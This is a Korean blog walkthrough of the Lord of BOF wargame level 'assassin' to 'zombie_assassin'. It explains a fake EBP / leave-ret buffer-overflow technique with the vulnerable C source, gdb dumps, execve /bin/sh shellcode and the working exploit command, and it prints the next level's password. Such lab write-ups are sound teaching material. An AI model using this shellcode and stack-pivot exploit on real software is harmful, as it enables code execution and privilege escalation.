[16] assassin -> zombie_assassin ( Fake EBP & leaveret )

2017. 11. 20. 21:09SystemHacking/LOB(BOF원정대)


assassin / pushing me away

[assassin@localhost assassin]$ /bin/bash2

[assassin@localhost assassin]$ export SHELL=/bin/bash2



[ zombieassassin.c ]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
 
#include <stdio.h>
#include <stdlib.h>
 
main(int argc, char *argv[])
{
        char buffer[40];
 
        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }
 
        if(argv[1][47== '\xbf')
        {
                printf("stack retbayed you!\n");
                exit(0);
        }
 
        if(argv[1][47== '\x40')
        {
                printf("library retbayed you, too!!\n");
                exit(0);
        }
 
        // strncpy instead of strcpy!
        strncpy(buffer, argv[1], 48);
        printf("%s\n", buffer);
}
 
cs


hint : Fake EBP


[ Stack ]

buffer 40byte

saved ebp         4byte

saved eip         4byte <-- no stack,no RTL


[ Stack ] : Fake EBP 공격

buffer &shellcode

saved ebp     &buffer+4

saved eip         &leaveret

   .... 


1> main leave

mov esp,ebp

pop ebp => EBP: Fake EBP


2> main ret

pop eip => EIP: &leaveret


3> leave

mov esp,ebp => ESP: Fake EBP(&buffer+4)

pop ebp => EBP: &buffer+4에 있는 값


4> ret

pop eip => EIP: &buffer 

 => buffer에 위치한 쉘 코드가 실행된다 !



* &leaveret

0x80484df <main+159>:   leave


* 24byte shellcode

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80


[ gdb 분석 ]

[assassin@localhost assassin]$ cp zombie_assassin zombie_assassin.cp

[assassin@localhost assassin]$ gdb -q zombie_assassin.cp

(gdb) set disassembly-flavor intel

(gdb) disas main

0x8048440 <main>:       push   %ebp

0x8048441 <main+1>:     mov    %ebp,%esp

0x8048443 <main+3>:     sub    %esp,40

... (생략) ...

0x80484df <main+159>:   leave

(gdb) run $(python -c 'print "\x90" * 16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "BBBB" + "CCCC"')

Breakpoint 1, 0x80484df in main ()

(gdb) x/24x $ebp-40

0xbffffaa0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffab0:     0x6850c031      0x68732f2f      0x69622f68      0x50e3896e

fake ebp saved eip

0xbffffac0:     0x99e18953      0x80cd0bb0      0x42424242      0x43434343

0xbffffad0:     0x00000002      0xbffffb14      0xbffffb20      0x40013868


* fake ebp 지점의 값을 0xbffffaa0 - 4 로 변조

* saved eip 지점의 값은 &leaveret 주소로 변조

$(python -c 'print "\x90" * 16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x9c\xfa\xff\xbf" + "\xdf\x84\x04\x08"')


[ Payload 작성 ]


* &leaveret

0x80484df <main+159>:   leave


* 24byte shellcode

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80


=> 주소값 보정작업 : fake ebp값이 조금 변했다

[assassin@localhost assassin]$./zombie_assassin $(python -c 'print "\x90"*16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x98\xfa\xff\xbf" + "\xdf\x84\x04\x08"')

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒ᙰ

                                   ̀▒▒▒▒߄

bash$ id

uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)

bash$ my-pass

euid = 516

no place to hide

bash$